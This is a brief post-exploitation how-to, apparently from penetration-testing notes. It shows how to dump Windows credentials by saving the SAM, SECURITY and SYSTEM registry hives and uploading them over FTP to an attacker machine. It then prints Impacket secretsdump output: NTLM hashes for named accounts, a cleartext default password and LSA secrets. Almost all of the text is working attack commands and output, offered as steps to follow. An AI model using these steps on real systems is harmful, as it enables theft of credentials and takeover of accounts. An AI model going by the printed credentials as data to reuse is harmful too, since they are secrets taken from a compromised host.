This is similar to the hashdump
command in the (frowned-upon-by-OffSec Metasploit Framework).
In exploited Windows system, do the following:
C:\> reg.exe save hklm\sam sam
C:\> reg.exe save hklm\security security
C:\> reg.exe save hklm\system system
Then, get these files to your attacker box. E.g.: Using FTP:
ftp> bin
200 TYPE is now 8-bit binary
ftp> put system
200 PORT command successful
ftp> put security
200 PORT command successful
ftp> put sam
200 PORT command successful
The bin
command is VERY important and the next step will not work if not used. Next, we run the Impacket Python script, secretsdump.py
like so:
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
[*] Target system bootKey: 0x371c6e102028a5b0e79ccc268d721c26
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f53ac7dfad4fe8c3e632e6d3becdccd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:11e102c7f485f3e21f5ca486c7d85b4c:::
kevin:1000:aad3b435b51404eeaad3b435b51404ee:3164f206290117d74e9fa582139828d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:173cf47d45ff85470ccd9c4bd609c518:::
trevelyn:1003:aad3b435b51404eeaad3b435b51404ee:7213b1af7ba9bfea55d6305a0a6686f5:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):r4UBwM8sSx
[*] DPAPI_SYSTEM
0000 01 00 00 00 CC 5F BF 2F 58 69 C0 13 E9 00 2B A9 ....._./Xi....+.
0010 E7 95 6D 7C 68 4B 7C C1 23 E2 DE 6F 48 70 31 8E ..m|hK|.#..oHp1.
0020 96 26 83 EC 16 98 BD 9F ED 01 EE 7C .&.........|
DPAPI_SYSTEM:01000000cc5fbf2f5869c013e9002ba9e7956d7c684b7cc123e2de6f4870318e962683ec1698bd9fed01ee7c
[*] NL$KM
0000 BC 28 86 EE C0 B6 91 0A 8C 2D 84 63 A0 BE 36 B7 .(.......-.c..6.
0010 56 38 88 99 72 53 44 DC 51 CE F5 51 D1 4E 37 B8 V8..rSD.Q..Q.N7.
0020 2E 28 23 C5 70 BB 5E EB 13 38 9D 42 8E B1 17 6A .(#.p.^..8.B...j
0030 E2 89 4E CF AB 6F 73 CE 1D 0E 8B BA 58 D0 1E 72 ..N..os.....X..r
NL$KM:bc2886eec0b6910a8c2d8463a0be36b756388899725344dc51cef551d14e37b82e2823c570bb5eeb13389d428eb1176ae2894ecfab6f73ce1d0e8bba58d01e72
[*] Cleaning up...